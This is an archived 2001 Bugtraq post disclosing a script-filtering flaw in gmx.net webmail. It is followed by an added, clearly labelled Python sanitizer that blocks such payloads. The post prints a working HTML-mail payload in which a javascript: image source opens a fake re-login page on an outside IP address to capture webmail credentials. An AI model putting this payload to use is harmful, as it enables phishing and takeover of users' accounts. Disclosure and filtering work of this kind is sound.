gmx.net

From: rudi carell (rudicarellat_private)
Date: Mon Jun 11 2001 - 09:31:04 PDT


    good morning bugtraq,
    
    gmx.net is a european-based free web-mail and web-community system comparable 
    with hotmail.com.
    
    like many other web-mail systems gmx.net has a problem filtering java-script 
    in html-based mail-messages.
    
    this enables an attacker to create html-messages with malicious java-script 
    embedded.
    
    problem description:
    
    the html <img> tag can be used to embed malicious
    java-scripts within html-mails.
    
    once the "html-mailpart" is opened by the gmx-user it is possible that
    the "embedded" java-script is executed by the web-browser (if enabled :-). this 
    makes it possible to place trojans and execute URL-based webmail-commands, 
    leading to a compromise of the user's webmail-account.
    
    sample with "classic" relogin-trojan:
    
    ---cut here---
    
    <html><body> <img src="javascript: 
    gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
    <h4>mungo baby</h4></body></html>
    
    ---cut here---
    
    .. not very sophisticated but working... changing user-options would be more 
    elaborate ..
    
    
    nice day,
    
    
    rc
    
    rudicarellat_private
    securityat_private
    http://www.freefly.com
    
    
    
    
    
    vendor status: mail has been sent to securityat_private
    
    
    RC-EOF
    
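The filtering failure the post describes is that a `javascript:` URL in an `<img src>` attribute of an HTML mail part reaches the browser unchanged. The following is an added example, not code from the original message and not gmx.net's own filter: a hypothetical, standard-library-only Python sanitizer of the kind a webmail gateway would run over the HTML part before rendering. It goes slightly beyond the post's single case: URL-bearing attributes are checked against an allow-list of schemes after stripping the ASCII whitespace and control characters browsers ignore inside a scheme (the posted payload has a newline right after `javascript:`), numeric character references are decoded before the check, and inline event-handler attributes and `<script>`-like elements are dropped as well. The sample mail, the `example.invalid` host and all names are constructed for the example.

```python
import html
import re
from html.parser import HTMLParser

# Attributes whose value is a URL and therefore needs a scheme check.
URL_ATTRS = {"src", "href", "background", "action", "formaction"}
# Schemes allowed inside rendered mail; anything else (javascript:, data:,
# vbscript:, ...) is dropped. Relative URLs have no scheme and are allowed.
SAFE_SCHEMES = {"http", "https", "cid", "mailto"}
# Elements that are script or content-embedding sinks in a mail context.
DROP_ELEMENTS = {"script", "iframe", "object", "embed"}
# Inline event handlers (onload, onerror, onmouseover, ...).
EVENT_ATTR = re.compile(r"^on[a-z]+$")
# Browsers ignore ASCII control characters and whitespace inside a scheme,
# so "java\nscript:" or "java\tscript:" still parse as javascript:.
CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")
# A URL scheme: ALPHA followed by ALPHA / DIGIT / "+" / "-" / ".", then ":".
SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def url_is_safe(value):
    """True if the attribute value is a relative URL or uses an allowed scheme."""
    if value is None:            # bare attribute such as <img src>
        return True
    cleaned = CONTROL_WS.sub("", value)   # normalise before looking for a scheme
    match = SCHEME.match(cleaned)
    if not match:
        return True              # no scheme: relative reference
    return match.group(1).lower() in SAFE_SCHEMES


class MailHtmlSanitizer(HTMLParser):
    """Re-emits HTML while dropping script elements, event handlers and
    URL attributes with disallowed schemes. Findings are collected so a
    gateway can log them or quarantine the message."""

    def __init__(self):
        # convert_charrefs=True decodes &#106;avascript: to javascript: for us
        super().__init__(convert_charrefs=True)
        self.out = []
        self.findings = []
        self._skip_depth = 0     # >0 while inside a dropped element

    def _filter_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:       # HTMLParser already lowercases names
            if EVENT_ATTR.match(name):
                self.findings.append(f"dropped {name} handler on <{tag}>")
            elif name in URL_ATTRS and not url_is_safe(value):
                self.findings.append(f"dropped {name} with unsafe URL on <{tag}>")
            else:
                kept.append((name, value))
        return "".join(
            f' {n}="{html.escape(v, quote=True)}"' if v is not None else f" {n}"
            for n, v in kept
        )

    def handle_starttag(self, tag, attrs):
        if tag in DROP_ELEMENTS:
            self.findings.append(f"dropped <{tag}> element")
            self._skip_depth += 1
            return
        if self._skip_depth:
            return
        self.out.append(f"<{tag}{self._filter_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        if tag in DROP_ELEMENTS or self._skip_depth:
            return
        self.out.append(f"<{tag}{self._filter_attrs(tag, attrs)}/>")

    def handle_endtag(self, tag):
        if tag in DROP_ELEMENTS:
            if self._skip_depth:
                self._skip_depth -= 1
            return
        if not self._skip_depth:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize(html_text):
    """Return (sanitized_html, findings) for one HTML mail part."""
    parser = MailHtmlSanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out), parser.findings


# Constructed sample in the shape of the posted mail (not the original payload):
# one image with a javascript: scheme split by a newline, one benign image.
SAMPLE_MAIL = (
    '<html><body><img src="javascript:\n attacker()">'
    '<img src="http://example.invalid/logo.png">'
    "<h4>mungo baby</h4></body></html>"
)

if __name__ == "__main__":
    clean, findings = sanitize(SAMPLE_MAIL)
    print(clean)
    for finding in findings:
        print("finding:", finding)
```

The check is deliberately an allow-list on the scheme rather than a search for the string `javascript:`, because the latter misses case variants, embedded whitespace and entity-encoded forms that browsers still execute. In a gateway the `findings` list is the detection signal: a message that needed any attribute dropped is worth logging with sender and recipient, even though the rendered copy is now inert.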



    This archive was generated by hypermail 2b30 : Mon Jun 11 2001 - 11:48:06 PDT